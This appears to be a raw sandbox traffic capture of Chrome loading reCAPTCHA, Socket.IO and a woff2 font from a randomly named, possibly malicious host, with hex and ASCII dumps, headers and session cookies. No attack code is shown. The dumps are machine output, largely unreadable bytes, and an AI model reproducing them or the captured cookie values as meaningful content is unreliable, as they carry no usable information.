                          2024-05-22 15:57:22 UTC1369INData Raw: bf 68 6e ae 66 24 8e 7d 5f 63 dd ad 18 fe a6 ff 2f f7 e0 48 1c b2 5f b8 86 07 10 29 77 0d 94 bb da 56 ae 12 b2 a3 52 05 42 25 2a c4 14 33 04 30 9f 14 5e 4b 90 15 6a 35 2d 17 f1 e9 d1 c8 8c 10 b7 07 f7 7c d3 af d8 6b dd ed c3 7e 30 12 fb 17 34 1b 0d 60 54 b1 df fa a9 f5 63 20 86 c1 4c 3a c3 70 bf e7 87 a0 95 ae a4 74 86 83 52 38 d4 c4 23 96 f5 2c c3 50 ba 17 53 ce 30 ae 2e 00 50 aa d5 6a 85 52 1b 8f 90 9e d5 b1 7a a4 65 75 f8 2d ac bd b6 ce 7a b1 ff 71 ec 9f 37 82 ee f0 43 77 d6 a3 32 e1 06 3f f4 99 35 07 ca 67 99 f7 a1 fc 9d 50 be 0f 13 ca c4 30 53 2d d9 2e 88 c7 84 7e cc 00 53 f9 46 86 65 09 e9 8c 67 99 12 71 1c e1 0e f2 42 e5 e1 61 be 9a 68 7d 58 4c 78 4c 48 90 26 d4 37 34 31 42 05 cd d2 e8 52 c3 b0 9f af 42 e9 ef ef e7 eb 89 f5 3a 94 9a 87 d3 d3 62 f4
                          Data Ascii: hnf$}_c/H_)wVRB%*30^Kj5-|k~04`Tc L:ptR8#,PS0.PjRzeu-zq7Cw2?5gP0S-.~SFegqBah}XLxLH&741BRB:b
                          2024-05-22 15:57:22 UTC1369INData Raw: 20 2a ef 78 d7 b5 cd 45 45 5b 6e 74 ff e5 22 3a 74 e6 cc b9 53 7f e5 87 cc 6d c7 17 37 9e 58 9a 61 3d 8f bf da d6 df b7 4b 50 42 bd 3d a3 67 f9 eb c0 1f 2d 93 c4 58 2c 53 c3 42 43 82 7d 78 cc fa 69 c0 20 c0 a5 be 64 0a 9e 9c 65 81 01 88 31 44 07 24 05 26 01 cb b4 48 3b 39 cb 94 5a a5 81 b0 2d c3 6c 30 6b 33 32 c6 f1 0e d9 78 46 3e e7 ce fa d1 f2 57 cb 5e e9 9d 37 9c fe 79 f7 27 e9 a9 c0 3b 67 3c 3c 26 dc 5d f2 a3 e6 57 cd 53 8f 19 a3 3f 6f fc a4 ec ad c9 78 79 1f 9d 93 83 99 54 4b 12 0b 76 02 99 91 c5 a9 bf 11 b4 36 5b cb d8 4d ff be 9a a0 00 4d b0 6f b0 4e 3d cd 57 09 52 85 60 06 06 51 8d 8c 84 e9 16 f4 06 30 58 9e 7d b9 85 f7 df 83 ba 5f 10 1e 67 15 ac 70 e7 22 7a b2 f3 d1 f5 d3 05 c3 d1 fb ce 1f 12 04 f6 ee ee 1f c5 58 d7 e3 55 d6 fd c0 ec a5 87 85 c7
                          Data Ascii: *xEE[nt":tSm7Xa=KPB=g-X,SBC}xi de1D$&H;9Z-l0k32xF>W^7y';g<<&]WS?oxyTKv6[MMoN=WR`Q0X}_gp"zXU
                          2024-05-22 15:57:22 UTC1369INData Raw: e6 70 cf 02 bd 11 4c b9 65 66 58 28 56 91 e1 64 93 29 7b 49 42 60 ed 03 9f cb 18 22 48 2e 36 7a 83 03 35 3e 6a 6f 2f 4f 0f 91 68 05 13 81 22 5c c7 a8 b6 1b 5a 7e 9e ec 18 e9 ec db 4d dd c5 79 d6 39 63 8e 50 de 92 69 ba a9 29 09 85 41 a5 86 35 c2 9c ee ea a2 0d 46 69 bc 85 9e 62 63 a7 96 c5 98 32 8d fa e9 a6 3c 42 73 99 50 85 5d e8 fc 01 d6 90 c6 c7 45 c1 51 25 20 cf 23 ac 8d 3a 6f 4f e0 23 cc 22 dc 18 45 30 7d 8c e3 61 54 6b 6f 99 e5 62 75 53 ae 29 61 46 48 99 b1 47 a8 5a 59 5b d6 17 45 d8 15 d2 5b 98 91 13 6d 98 9e 99 4d e6 2c a1 8a ce 59 09 c4 8f 57 20 c4 c6 c5 42 3f e2 52 e2 72 d2 99 8f 8e 3e 6d 19 58 10 76 dd 69 88 0e 0c f0 d3 78 7b b9 2a 99 04 94 60 d7 9d 64 90 39 ce 6a 0a a5 82 fc df 8e 4b 47 9b 7b e3 a6 f8 4f 09 1c 20 73 dd fd cf ff e0 dc c5 92 32
                          Data Ascii: pLefX(Vd){IB`"H.6z5>jo/Oh"\Z~My9cPi)A5Fibc2<BsP]EQ% #:oO#"E0}aTkobuS)aFHGZY[E[mM,YW B?Rr>mXvix{*`d9jKG{O s2


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          33192.168.2.449774216.58.206.684435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:21 UTC635OUTGET /recaptcha/api.js HTTP/1.1
                          Host: www.google.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: script
                          Referer: https://oknya83345.eleteriod.com/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-22 15:57:21 UTC528INHTTP/1.1 200 OK
                          Content-Type: text/javascript; charset=utf-8
                          Expires: Wed, 22 May 2024 15:57:21 GMT
                          Date: Wed, 22 May 2024 15:57:21 GMT
                          Cache-Control: private, max-age=300
                          Cross-Origin-Resource-Policy: cross-origin
                          X-Content-Type-Options: nosniff
                          X-Frame-Options: SAMEORIGIN
                          Content-Security-Policy: frame-ancestors 'self'
                          X-XSS-Protection: 1; mode=block
                          Server: GSE
                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                          Accept-Ranges: none
                          Vary: Accept-Encoding
                          Connection: close
                          Transfer-Encoding: chunked
                          2024-05-22 15:57:21 UTC862INData Raw: 35 38 36 0d 0a 2f 2a 20 50 4c 45 41 53 45 20 44 4f 20 4e 4f 54 20 43 4f 50 59 20 41 4e 44 20 50 41 53 54 45 20 54 48 49 53 20 43 4f 44 45 2e 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 77 3d 77 69 6e 64 6f 77 2c 43 3d 27 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 27 2c 63 66 67 3d 77 5b 43 5d 3d 77 5b 43 5d 7c 7c 7b 7d 2c 4e 3d 27 67 72 65 63 61 70 74 63 68 61 27 3b 76 61 72 20 67 72 3d 77 5b 4e 5d 3d 77 5b 4e 5d 7c 7c 7b 7d 3b 67 72 2e 72 65 61 64 79 3d 67 72 2e 72 65 61 64 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 28 63 66 67 5b 27 66 6e 73 27 5d 3d 63 66 67 5b 27 66 6e 73 27 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 66 29 3b 7d 3b 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67
                          Data Ascii: 586/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.g
                          2024-05-22 15:57:21 UTC559INData Raw: 72 65 63 61 74 69 6f 6e 4c 61 62 65 6c 2e 67 65 74 56 61 6c 75 65 28 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 69 66 28 6c 21 3d 3d 27 74 72 65 61 74 6d 65 6e 74 5f 31 2e 31 27 26 26 6c 21 3d 3d 27 74 72 65 61 74 6d 65 6e 74 5f 31 2e 32 27 26 26 6c 21 3d 3d 27 63 6f 6e 74 72 6f 6c 5f 31 2e 31 27 29 7b 64 2e 68 65 61 64 2e 70 72 65 70 65 6e 64 28 6d 29 3b 7d 7d 29 3b 7d 65 6c 73 65 7b 64 2e 68 65 61 64 2e 70 72 65 70 65 6e 64 28 6d 29 3b 7d 70 6f 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 6a 6f 48 41 36 30 4d 65 4d 45 2d 50 4e 76 69 4c 35 39 78 56 48 39 7a 73 2f 72 65 63 61 70 74 63 68 61 5f 5f 65 6e 2e 6a 73 27 3b 70 6f 2e 63 72 6f 73 73
                          Data Ascii: recationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!=='control_1.1'){d.head.prepend(m);}});}else{d.head.prepend(m);}po.src='https://www.gstatic.com/recaptcha/releases/joHA60MeME-PNviL59xVH9zs/recaptcha__en.js';po.cross
                          2024-05-22 15:57:21 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          34192.168.2.44977518.245.31.894435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:21 UTC543OUTGET /4.6.0/socket.io.min.js HTTP/1.1
                          Host: cdn.socket.io
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: script
                          Referer: https://oknya83345.eleteriod.com/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-22 15:57:21 UTC703INHTTP/1.1 200 OK
                          Content-Type: application/javascript; charset=utf-8
                          Content-Length: 45806
                          Connection: close
                          Accept-Ranges: bytes
                          Access-Control-Allow-Origin: *
                          Cache-Control: public, max-age=31536000, immutable
                          Content-Disposition: inline; filename="socket.io.min.js"
                          Date: Fri, 05 Jan 2024 09:12:45 GMT
                          ETag: "80f5b8c6a9eeac15de93e5a112036a06"
                          Server: Vercel
                          Strict-Transport-Security: max-age=63072000
                          X-Vercel-Cache: HIT
                          X-Vercel-Id: fra1::kcxpj-1704445965394-d209ffeb73cf
                          X-Cache: Hit from cloudfront
                          Via: 1.1 1e0f88a39289286be3e03ff93487da80.cloudfront.net (CloudFront)
                          X-Amz-Cf-Pop: FRA56-P8
                          X-Amz-Cf-Id: hHVxNX-trxyMUaeM-e3K8IPtfox9VHqTpwnh0GpkpeYuOmLHB8zHvA==
                          Age: 12065541
                          2024-05-22 15:57:21 UTC16384INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 36 2e 30 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 33 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 65 29 3a 28 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                          Data Ascii: /*! * Socket.IO v4.6.0 * (c) 2014-2023 Guillermo Rauch * Released under the MIT License. */!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof g
                          2024-05-22 15:57:21 UTC16384INData Raw: 6c 65 3d 21 31 3b 66 6f 72 28 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 72 3d 74 5b 6e 5d 2c 69 3d 6e 3d 3d 3d 74 2e 6c 65 6e 67 74 68 2d 31 3b 45 28 72 2c 65 2e 73 75 70 70 6f 72 74 73 42 69 6e 61 72 79 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 72 79 7b 65 2e 77 73 2e 73 65 6e 64 28 74 29 7d 63 61 74 63 68 28 74 29 7b 7d 69 26 26 69 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 77 72 69 74 61 62 6c 65 3d 21 30 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 64 72 61 69 6e 22 29 7d 29 2c 65 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 29 7d 29 29 7d 2c 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 6e 28 72 29 7d 7d 2c 7b 6b 65 79 3a 22 64 6f 43 6c 6f 73 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 6f
                          Data Ascii: le=!1;for(var n=function(n){var r=t[n],i=n===t.length-1;E(r,e.supportsBinary,(function(t){try{e.ws.send(t)}catch(t){}i&&it((function(){e.writable=!0,e.emitReserved("drain")}),e.setTimeoutFn)}))},r=0;r<t.length;r++)n(r)}},{key:"doClose",value:function(){vo
                          2024-05-22 15:57:21 UTC12004INData Raw: 73 68 69 66 74 28 74 29 2c 74 68 69 73 2e 5f 6f 70 74 73 2e 72 65 74 72 69 65 73 26 26 21 74 68 69 73 2e 66 6c 61 67 73 2e 66 72 6f 6d 51 75 65 75 65 26 26 21 74 68 69 73 2e 66 6c 61 67 73 2e 76 6f 6c 61 74 69 6c 65 29 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 61 64 64 54 6f 51 75 65 75 65 28 6e 29 2c 74 68 69 73 3b 76 61 72 20 69 3d 7b 74 79 70 65 3a 45 74 2e 45 56 45 4e 54 2c 64 61 74 61 3a 6e 2c 6f 70 74 69 6f 6e 73 3a 7b 7d 7d 3b 69 66 28 69 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6d 70 72 65 73 73 3d 21 31 21 3d 3d 74 68 69 73 2e 66 6c 61 67 73 2e 63 6f 6d 70 72 65 73 73 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 5b 6e 2e 6c 65 6e 67 74 68 2d 31 5d 29 7b 76 61 72 20 6f 3d 74 68 69 73 2e 69 64 73 2b 2b 2c 73 3d 6e 2e 70 6f 70 28 29 3b 74 68
                          Data Ascii: shift(t),this._opts.retries&&!this.flags.fromQueue&&!this.flags.volatile)return this._addToQueue(n),this;var i={type:Et.EVENT,data:n,options:{}};if(i.options.compress=!1!==this.flags.compress,"function"==typeof n[n.length-1]){var o=this.ids++,s=n.pop();th
                          2024-05-22 15:57:21 UTC1034INData Raw: 65 2c 65 3d 76 6f 69 64 20 30 29 3b 76 61 72 20 72 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 22 22 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 3f 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3a 76 6f 69 64 20 30 2c 72 3d 74 3b 6e 3d 6e 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6c 6f 63 61 74 69 6f 6e 26 26 6c 6f 63 61 74 69 6f 6e 2c 6e 75 6c 6c 3d 3d 74 26 26 28 74 3d 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 6e 2e 68 6f 73 74 29 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 22 2f 22 3d 3d 3d 74 2e 63 68 61 72 41
                          Data Ascii: e,e=void 0);var r,i=function(t){var e=arguments.length>1&&void 0!==arguments[1]?arguments[1]:"",n=arguments.length>2?arguments[2]:void 0,r=t;n=n||"undefined"!=typeof location&&location,null==t&&(t=n.protocol+"//"+n.host),"string"==typeof t&&("/"===t.charA


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          35192.168.2.449778188.114.96.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:23 UTC1408OUTGET /899Gmt1GFtekU1wpUI5scdHVrq7eMazbjlab71 HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          Origin: https://oknya83345.eleteriod.com
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: font
                          Referer: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxs
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6IkdzWDYyODR6NmlZdjNJWXVjd3NjRWc9PSIsInZhbHVlIjoiRXFqNDJES1VuM2wvNXFzK3hnWmVkRFhSSHJZMGg0VVA3S2I1ZlowaWQyWVE4Y2kxMS9lVVNzbG9MOFBPWS9USWx4V0d5RjF3SU1NZGZkbm1VM214VXk0K0hQVkdwMGF6QW5qeGx6YWlJMHBVcE1HU3BaY2V3Tmp0RElWZjJxTHAiLCJtYWMiOiI1Yzc2ZmExYzU1OGFmMDc4MDFkMjFmZmM3ZjgwYjZhOTAyZjYwZmVhZGVkMGU1ZjM2N2FkODQwZmI2NTYzOTNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlIyV0dETU5HdGx4czVsb0RvNCtWbmc9PSIsInZhbHVlIjoiSVVDWEl2cVpDNVpDZk5rQnpjaXgzSXJScGliRGg1b2R1T2FmdEdvSDMxWmZnblJFczlNWW8ydlZkSEdGVnNwYVJqaVFxeDNOTjFDQ0ZOY0x2ZXBTdElMVTR2U3dUa3h5Wnc0Zk5aa0czK1lmQ1o3K2lPQ0xKTFZUT0dNRC8yblgiLCJtYWMiOiJkYzc5NzRlN2U4NWZjMTJhZDYzYzE5MWI5ZmQxY2I0NTQ5MjY2MGRhZWFmN2JkYzIwNjJkYmRhM2EzZGVhZjNjIiwidGFnIjoiIn0%3D
                          2024-05-22 15:57:24 UTC643INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:57:24 GMT
                          Content-Type: font/woff2
                          Content-Length: 43596
                          Connection: close
                          Content-Disposition: inline; filename="899Gmt1GFtekU1wpUI5scdHVrq7eMazbjlab71"
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dgd0zHDIQYrwCoJvf%2FqMWmyXDx20%2F5fSe5CDIor%2Fe%2BQ0MuRoDxxv6BFI8hvK%2Fwn%2F2BYPyuo5oMHvs7Lg3gcR2atza2L8z2IWleNv0Mun3Wd%2ButFWheScEk%2BHiKbh5g%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
                          Server: cloudflare
                          CF-RAY: 887e006c9b9a41ff-EWR
                          2024-05-22 15:57:24 UTC726INData Raw: 77 4f 46 32 00 01 00 00 00 00 aa 4c 00 13 00 00 00 01 cf 50 00 00 a9 d5 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 83 55 1b 82 e4 7a 1c 8b 04 3f 48 56 41 52 8a 3b 3f 4d 56 41 52 46 06 60 3f 53 54 41 54 1c 00 8e 48 2f 4c 11 08 0a 81 c2 40 81 a5 50 0b 87 3e 00 30 82 8e 00 01 36 02 24 03 8e 78 04 20 05 8d 2e 07 97 7b 5b d6 bb 71 05 b3 c3 e4 8f 52 6c ba 0d 01 b0 74 fa f4 7e 76 f7 0b e8 b1 ed 28 e5 b6 c1 e8 b6 d0 54 c3 74 05 3b f6 14 6e 27 b0 dd 76 3d cc fe ff ff 3f 7f 99 88 6c 5d 02 78 49 92 b5 85 6d 1d 22 a8 ea 3f 68 4e 58 04 2c 02 96 b5 38 1a 3b 47 b4 d6 af cb 6d 2c 7d c1 68 d7 aa 3e 28 3d 5b ac 96 88 6d 2f d4 3e 9b b8 a1 ef 38 26 66 c1 e0 26 9d 06 1b b8 9b ad 91 5d a1 75 95 dd e0 26 9c 56 44 8f e5 5d ec 3c 8d 04 79 52 93 65
                          Data Ascii: wOF2LPUz?HVAR;?MVARF`?STATH/L@P>06$x .{[qRlt~v(Tt;n'v=?l]xIm"?hNX,8;Gm,}h>(=[m/>8&f&]u&VD]<yRe
                          2024-05-22 15:57:24 UTC1369INData Raw: 22 bc 78 5a 0f b7 3d 62 5e e9 ec bf 1e 69 44 96 e1 11 7d 20 8c 8e 20 be ec 62 a6 ec fc 7d 44 49 76 75 d1 71 04 88 0f d8 6b cb 96 34 d2 0c f7 cc 14 40 c0 10 ce d5 ff 50 2a b0 b0 6a dc ed 89 29 f7 ec 94 27 df 4c 97 eb 89 c9 c2 ae b3 dc b1 62 e0 85 52 51 6a 49 2a 49 9b b4 51 6b da 54 ae 6c fa 5f 77 4f 0f d0 92 24 cb 1f e8 08 21 63 cc 2e 25 cb 7b 80 95 5f 4e 90 02 45 40 fc 00 0d 92 41 b0 da 9d f9 3f 9c ee 9a d9 61 57 0b 79 99 67 66 9d 67 1b 26 45 bc 0c f7 20 7e 88 78 f0 62 c5 cc 83 05 b5 62 c1 82 85 7e f8 a7 d6 f4 ef 1e 66 2f 80 a8 0a 1e d0 47 8a 82 b3 9d 4a 1b 36 b2 79 fe b3 df fa 0e 7a 45 40 54 9c 61 aa 30 5e 55 6c f6 df cf 06 00 fc 53 3a c3 bf 92 2c 03 9e 7d 04 1b 42 ec 52 a7 a8 52 74 7e b7 76 d1 85 00 ba 4c 3a 60 34 c1 49 4b 41 1c e6 bd a7 56 a3 ca b1 b7
                          Data Ascii: "xZ=b^iD} b}DIvuqk4@P*j)'LbRQjI*IQkTl_wO$!c.%{_NE@A?aWygfg&E ~xbb~f/GJ6yzE@Ta0^UlS:,}BRRt~vL:`4IKAV
                          2024-05-22 15:57:24 UTC1369INData Raw: 4f f3 74 a7 db f2 6c 99 b1 ee b6 3e d8 2e 6d d7 b6 39 fb 46 fb 99 7d 9e 5d 57 72 91 73 73 4b bc 1c 72 12 ba 1e 36 36 7c 33 22 22 2a 2a 26 26 21 c1 e1 10 c5 bc bc 32 65 90 3a 76 de b1 83 76 d7 75 c7 d1 ff bd fa ef 37 7f f3 ee 97 3e fc ec d3 2f 3e 0d 7f 59 f7 9d e0 41 40 40 00 c8 82 05 10 40 c9 06 6a 8b 76 3f a2 63 04 fc cf bf 1a e0 05 82 e1 03 a0 ae 09 a0 0b f4 c0 a3 aa 1c 80 71 5b ad cd 01 38 80 ba 26 50 ed 76 16 e9 84 82 9d 77 d3 ef ac 8c 5b 06 e0 52 8b 81 00 1e 2c a6 f3 af 20 bc 4c 15 e0 d4 43 23 d6 51 35 b8 91 3c 4e 8d af 4d f0 9a f0 ff 89 98 49 1e c3 96 a1 ef 1e ef ae 41 39 d4 0e be a1 72 98 1c b4 98 29 ef a4 9e 40 7d 80 28 93 fa a9 ef 70 df d3 54 b5 e2 d5 ba 81 b2 f7 81 f6 10 fa 79 c4 7a c4 26 c4 11 70 a2 46 71 8f 62 7e 37 d0 ca bd 8a d4 e0 c1 fc fb
                          Data Ascii: Otl>.m9F}]WrssKr66|3""**&&!2e:vvu7>/>YA@@@jv?cq[8&Pvw[R, LC#Q5<NMIA9r)@}(pTyz&pFqb~7
                          2024-05-22 15:57:24 UTC1369INData Raw: 38 10 e1 cc a9 19 64 33 3f 2a 25 ab 11 e4 13 01 e9 44 ae 3d cb 5b 69 7e db 22 51 70 ef 63 32 39 e9 64 71 a7 b5 30 b6 01 15 1a 29 e2 db ce 53 01 4b 24 89 db 11 9c 91 10 7d 9c ef d5 0f e1 38 11 2a 9e 08 b1 c6 95 68 36 08 c4 a8 a2 b4 98 b5 21 8e 45 d0 71 24 18 a7 83 42 25 37 a3 0f 52 82 02 89 71 3b a6 33 e3 76 a8 96 c5 96 00 31 78 04 a8 30 14 19 d5 19 35 da 35 a1 cc 49 64 7a 77 af a4 2d 6a 48 d5 f9 10 15 85 2c 13 a3 9e f6 44 fc 18 de 56 cd 85 7c a5 47 ac 97 c9 a3 b9 57 e1 c4 0a 96 52 70 14 1b 9d cf 6b 27 9f a5 fa bd 08 79 02 2c 96 02 20 16 9d 4d 88 68 fb d6 4a 21 21 6d b6 8c 58 80 8a 4a bd a3 a3 79 25 a6 aa 2e 1a 3d c6 77 60 74 91 90 6a 2a 81 e2 98 32 ad 42 a4 cf 75 c9 16 1c 25 3d 79 6f 32 9f 8e cf 45 7e e6 05 e8 4e 24 f2 4f 2c 8e ab 2d 9c 9c 76 49 bb eb d8
                          Data Ascii: 8d3?*%D=[i~"Qpc29dq0)SK$}8*h6!Eq$B%7Rq;3v1x055Idzw-jH,DV|GWRpk'y, MhJ!!mXJy%.=w`tj*2Bu%=yo2E~N$O,-vI
                          2024-05-22 15:57:24 UTC1369INData Raw: d2 5a 1e 85 94 34 75 e8 49 d3 5e 26 60 bf a5 86 5b 4a 69 0c d1 e1 b8 20 fc 23 8b 97 28 3f 36 3d bc 0d d8 3d 52 72 fe 9d 98 df f6 99 86 c4 bc 22 f8 09 5a 28 e5 b7 77 89 61 b7 36 f9 53 75 68 4b 1e a3 d9 26 75 d4 2c cc 9b ab c9 a0 c4 be a0 65 70 6a fc 71 23 f4 aa f8 fc 97 90 31 c6 86 3b 8d 2e bf 22 ac c8 63 a8 a4 64 cd 76 00 e5 20 65 ff cf 30 3f a6 13 d2 e5 62 0b a4 27 2d 7d 39 cc f0 e0 9e 1d af b5 ec 6f 86 84 31 96 bb 8e 91 1f de f5 79 ed 91 b4 46 3e b6 fa d8 67 65 be e3 e4 c7 96 8c a1 bb 91 79 70 21 64 5b 43 4a bb 5f ce 7f 6a 9e e2 6c 74 bd 98 84 44 03 65 56 43 e1 02 9a f1 01 c9 b2 0e 5a 9a 74 1e 19 d7 2d 04 6b 89 4f 3e 7f eb 62 e6 73 66 69 2d cd a3 e6 3f 27 75 aa 1d f4 11 10 73 fc 42 d2 5a c5 86 43 23 db 5e 68 e7 7a 4b d7 dd 63 72 dd 6d 59 de 57 ba ed 90
                          Data Ascii: Z4uI^&`[Ji #(?6==Rr"Z(wa6SuhK&u,epjq#1;."cdv e0?b'-}9o1yF>geyp!d[CJ_jltDeVCZt-kO>bsfi-?'usBZC#^hzKcrmYW
                          2024-05-22 15:57:24 UTC1369INData Raw: e1 de 58 7f 4c 93 b6 dc c8 6b a3 ce 59 5f c3 25 0b 9d f2 4a e9 03 fe a9 a9 bb 81 48 18 fa 58 6c d7 68 8e c9 73 ff 93 f3 ea 71 72 7c d4 67 35 e2 25 58 ad 9b 53 bb 0e 1a 84 1a b8 82 5e 74 f8 f1 ff 58 67 54 9d 62 90 e9 68 f1 c4 58 64 f4 a7 11 7b 4a 5a 49 91 3e 4e c4 a0 f3 c2 16 05 ca 58 f5 2f 67 94 92 df bd d2 cb da 8d 4e 2f c9 b6 83 3e 5b 35 3d f8 fc e3 65 9c 37 d6 d2 a2 c6 49 f6 ae d8 e1 89 37 ae 63 7d 3f 6f 70 d7 3f 3b 22 5b 75 e5 01 5e 3b bd 02 7a e2 ad bd 31 24 3b ab 34 eb 3d 4b b2 d1 8a eb d4 09 e1 09 bc 2e 7f c6 88 31 51 e6 fa 1c 6a c5 06 7d 66 4a f0 e0 eb c6 48 eb a6 3e de c9 7a 7d 78 4b d7 98 bd e2 c3 08 cd f3 88 6d ff fa 2e f6 41 89 df d6 d2 4a ff 7b f6 01 aa 12 65 af e8 2b 9c 2a 6b b9 21 bb 8c e8 e3 a7 1f ef 6f bf d7 f8 0b 47 b0 c3 71 a6 2e 6c 7f
                          Data Ascii: XLkY_%JHXlhsqr|g5%XS^tXgTbhXd{JZI>NX/gN/>[5=e7I7c}?op?;"[u^;z1$;4=K.1Qj}fJH>z}xKm.AJ{e+*k!oGq.l
